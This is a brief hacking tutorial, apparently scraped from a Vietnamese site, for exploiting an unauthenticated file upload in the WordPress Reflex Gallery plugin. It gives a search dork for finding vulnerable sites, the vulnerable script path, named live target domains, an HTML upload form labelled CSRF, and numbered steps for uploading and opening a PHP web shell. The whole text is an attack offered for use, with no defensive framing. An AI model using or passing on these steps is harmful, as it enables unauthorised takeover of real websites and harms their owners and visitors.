——————————————————————–
– Dork : inurl:/wp-content/plugins/reflex-gallery/
– Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
– Vuln : {“error”:”No files were uploaded.”}
– My Site Vuln : http://sjoyster.com/
– Script CSRF :
<html>
<title>Reflex-Gallery CSRF</title>
<form method=”POST” action=”http://straightlineinspection.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php” enctype=”multipart/form-data” >
<input type=”file” name=”qqfile”><br>
<input type=”submit” name=”Submit” value=”Pwn!”>
![Dork Upload File FCKeditor [Update]](https://anonyviet.com/wp-content/uploads/2016/01/TheAppleHackAndWhatItMeansToYou.jpg)
</form>
</html>
———————————————————————-
Okay Lets Go to Tutorial
– Save script CSRF [ reflex.html ]
– Change The Site , to site Vuln
– Save
– Chek The Vuln
– Oh yeah , that vuln 😀
– Open The Script in the Browser
– Upload your shell
– bcc.php is my shell 🙂
– Click ” Pwn!”
– Succses 😀
– Open your Shell in the :
[ site.com/wp-content/uploads/shell.php
![Admin Login Bypass [0day] 1](https://anonyviet.com/wp-content/uploads/2015/12/kUwvo30.png)
Để lại bình luận